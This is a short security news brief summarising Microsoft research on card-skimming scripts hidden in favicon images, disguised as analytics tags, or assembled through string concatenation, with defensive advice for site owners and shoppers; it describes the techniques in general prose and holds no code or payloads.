Threat actors are using advanced techniques to hide their info-stealing code. Microsoft researchers said some of the recent skimming JavaScript and HTML files uploaded on VirusTotal have very low detection rates.

Stealthy skimmers

According to researchers, an uptick was spotted in three hiding methods, namely injection of the scripts in images, script spoofing, and string concatenation to make the skimmers stealthier or undetected.
  • In the first case, the malicious image files are uploaded to the target server masked as favicons. However, their contents include a PHP script with a base64-encoded JavaScript.
  • The string concatenation obfuscation is used by attackers to load the skimmer from a domain controlled by them using an implant on the targeted site.
  • The script spoofing trend is masking the skimmers as Meta Pixel (Facebook Pixel) or Google Analytics, two widely used visitor tracking tools that exist on almost all websites.

More information

Stealthy skimmers limit the effectiveness of threat detection products and increase threat levels to customers. As observed in the ongoing campaign, the attackers are obfuscating their code snippets, injecting them into image files, and masquerading as web applications.

What to do?

Along with active scanning and detection of threats, website admins are suggested to make sure to run the latest version of their CMS and plugins. Meanwhile, customers are advised to use one-time-use private cards and strict payment limits to better protect their hard-earned money from getting stolen.

Cyware Publisher